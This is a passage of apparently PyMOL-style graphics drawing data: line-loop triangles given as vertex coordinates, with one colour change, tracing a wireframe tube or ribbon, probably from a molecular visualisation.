BEGIN, LINE_LOOP,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 15.559, 29.952, 26.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 15.320, 30.026, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.846, 30.162, 25.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 15.710, 30.328, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.969, 30.182, 25.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 15.909, 30.408, 24.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.856, 30.000, 24.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.800, 30.221, 24.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.574, 29.723, 25.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.448, 29.876, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.287, 29.512, 26.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.058, 29.574, 26.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 15.164, 29.492, 26.965,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 14.859, 29.493, 27.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 15.277, 29.674, 27.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 14.967, 29.680, 27.566,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 15.320, 30.026, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.155, 30.170, 26.630,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 15.710, 30.328, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.459, 30.426, 25.478,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.909, 30.408, 24.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.600, 30.471, 24.613,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.800, 30.221, 24.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.495, 30.279, 24.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.495, 30.279, 24.543,
VERTEX, 15.448, 29.876, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.495, 30.279, 24.543,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.206, 29.963, 25.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 15.058, 29.574, 26.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 14.902, 29.707, 26.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.859, 29.493, 27.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 14.762, 29.662, 27.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.967, 29.680, 27.566,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 14.866, 29.854, 27.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 15.155, 30.170, 26.630,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 14.955, 30.329, 26.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 15.459, 30.426, 25.478,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.170, 30.536, 25.549,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 15.600, 30.471, 24.613,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.249, 30.545, 24.805,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 15.495, 30.279, 24.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 15.495, 30.279, 24.543,
VERTEX, 15.146, 30.349, 24.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.495, 30.279, 24.543,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 15.206, 29.963, 25.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 14.922, 30.065, 25.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.902, 29.707, 26.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.707, 29.857, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.762, 29.662, 27.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.628, 29.849, 27.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.866, 29.854, 27.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 14.731, 30.044, 27.191,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.955, 30.329, 26.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 14.699, 30.514, 26.422,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 15.170, 30.536, 25.549,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 14.825, 30.668, 25.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 15.249, 30.545, 24.805,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 14.841, 30.638, 25.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 15.146, 30.349, 24.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 14.739, 30.440, 24.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.146, 30.349, 24.742,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.922, 30.065, 25.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.578, 30.190, 25.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.922, 30.065, 25.396,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.707, 29.857, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.453, 30.036, 26.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.707, 29.857, 26.384,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.628, 29.849, 27.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.436, 30.067, 26.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.628, 29.849, 27.128,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.731, 30.044, 27.191,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 14.539, 30.265, 26.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 14.699, 30.514, 26.422,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 14.359, 30.741, 26.274,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.699, 30.514, 26.422,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 14.825, 30.668, 25.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 14.406, 30.836, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.825, 30.668, 25.644,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 14.841, 30.638, 25.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 14.369, 30.760, 25.379,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.841, 30.638, 25.055,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 14.739, 30.440, 24.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.269, 30.558, 25.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.739, 30.440, 24.999,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 14.578, 30.190, 25.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.166, 30.349, 25.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.578, 30.190, 25.510,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 14.453, 30.036, 26.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.119, 30.255, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.453, 30.036, 26.287,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 14.436, 30.067, 26.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.157, 30.331, 26.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.436, 30.067, 26.877,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 14.539, 30.265, 26.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 14.539, 30.265, 26.933,
VERTEX, 14.256, 30.532, 26.598,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 14.359, 30.741, 26.274,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 13.987, 30.957, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.359, 30.741, 26.274,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 14.406, 30.836, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 13.993, 30.996, 25.900,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.406, 30.836, 25.769,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 14.369, 30.760, 25.379,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 13.933, 30.877, 25.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.369, 30.760, 25.379,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 14.269, 30.558, 25.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 13.843, 30.669, 25.675,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.269, 30.558, 25.332,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 14.166, 30.349, 25.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 13.776, 30.494, 25.808,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.166, 30.349, 25.656,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 14.119, 30.255, 26.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 13.771, 30.455, 26.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.119, 30.255, 26.161,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 14.157, 30.331, 26.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 13.831, 30.574, 26.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.157, 30.331, 26.551,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 14.256, 30.532, 26.598,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 14.256, 30.532, 26.598,
VERTEX, 13.920, 30.782, 26.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.987, 30.957, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 13.663, 31.087, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.987, 30.957, 26.126,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.993, 30.996, 25.900,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 13.654, 31.124, 25.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.993, 30.996, 25.900,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.933, 30.877, 25.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 13.596, 30.998, 25.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.933, 30.877, 25.713,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.843, 30.669, 25.675,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 13.522, 30.783, 25.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.843, 30.669, 25.675,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.776, 30.494, 25.808,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 13.476, 30.605, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.776, 30.494, 25.808,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.771, 30.455, 26.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 13.484, 30.568, 26.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.771, 30.455, 26.034,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.831, 30.574, 26.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 13.542, 30.694, 26.231,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.831, 30.574, 26.221,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.920, 30.782, 26.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.920, 30.782, 26.259,
VERTEX, 13.616, 30.909, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.663, 31.087, 26.126,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.389, 31.172, 26.132,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.663, 31.087, 26.126,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.654, 31.124, 25.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.369, 31.206, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.654, 31.124, 25.899,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.596, 30.998, 25.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.313, 31.075, 25.726,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.596, 30.998, 25.716,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.522, 30.783, 25.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.255, 30.855, 25.697,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.522, 30.783, 25.684,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.476, 30.605, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.228, 30.674, 25.837,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.476, 30.605, 25.821,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.484, 30.568, 26.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.248, 30.640, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.484, 30.568, 26.048,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.542, 30.694, 26.231,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.304, 30.771, 26.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.542, 30.694, 26.231,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.616, 30.909, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.616, 30.909, 26.263,
VERTEX, 13.362, 30.992, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 13.389, 31.172, 26.132,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.156, 31.226, 26.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.389, 31.172, 26.132,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 13.369, 31.206, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.125, 31.258, 25.918,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.369, 31.206, 25.906,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 13.313, 31.075, 25.726,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.070, 31.123, 25.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.313, 31.075, 25.726,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 13.255, 30.855, 25.697,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.023, 30.900, 25.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.255, 30.855, 25.697,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 13.228, 30.674, 25.837,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.011, 30.719, 25.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.228, 30.674, 25.837,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 13.248, 30.640, 26.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.042, 30.687, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.248, 30.640, 26.063,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 13.304, 30.771, 26.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.097, 30.822, 26.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.304, 30.771, 26.243,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 13.362, 30.992, 26.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 13.362, 30.992, 26.272,
VERTEX, 13.144, 31.045, 26.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 13.156, 31.226, 26.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 12.954, 31.265, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.156, 31.226, 26.143,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 13.125, 31.258, 25.918,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 12.913, 31.296, 25.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.125, 31.258, 25.918,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 13.070, 31.123, 25.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 12.852, 31.160, 25.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 31.123, 25.740,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 13.023, 30.900, 25.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 12.805, 30.936, 25.735,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.023, 30.900, 25.714,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 13.011, 30.719, 25.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 12.802, 30.756, 25.878,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.011, 30.719, 25.855,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 13.042, 30.687, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 12.842, 30.725, 26.102,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.042, 30.687, 26.081,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 13.097, 30.822, 26.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 12.904, 30.861, 26.276,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.097, 30.822, 26.258,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 13.144, 31.045, 26.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 13.144, 31.045, 26.284,
VERTEX, 12.950, 31.085, 26.298,
END,
COLOR, 0.000, 0.827, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.954, 31.265, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.766, 31.127, 26.314,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 12.771, 31.305, 26.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.954, 31.265, 26.156,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.913, 31.296, 25.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.771, 31.305, 26.169,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 12.720, 31.336, 25.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.913, 31.296, 25.932,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.852, 31.160, 25.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 31.336, 25.947,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 12.643, 31.201, 25.778,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.852, 31.160, 25.758,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.805, 30.936, 25.735,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.643, 31.201, 25.778,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 12.585, 30.979, 25.761,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.805, 30.936, 25.735,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.802, 30.756, 25.878,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 30.979, 25.761,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 12.581, 30.801, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.802, 30.756, 25.878,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.842, 30.725, 26.102,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.581, 30.801, 25.906,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 12.632, 30.770, 26.127,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 30.725, 26.102,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.904, 30.861, 26.276,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.632, 30.770, 26.127,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 12.708, 30.906, 26.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.904, 30.861, 26.276,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.950, 31.085, 26.298,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.708, 30.906, 26.296,
VERTEX, 12.950, 31.085, 26.298,
VERTEX, 12.766, 31.127, 26.314,
END,
BEGIN, LINE_LOOP,
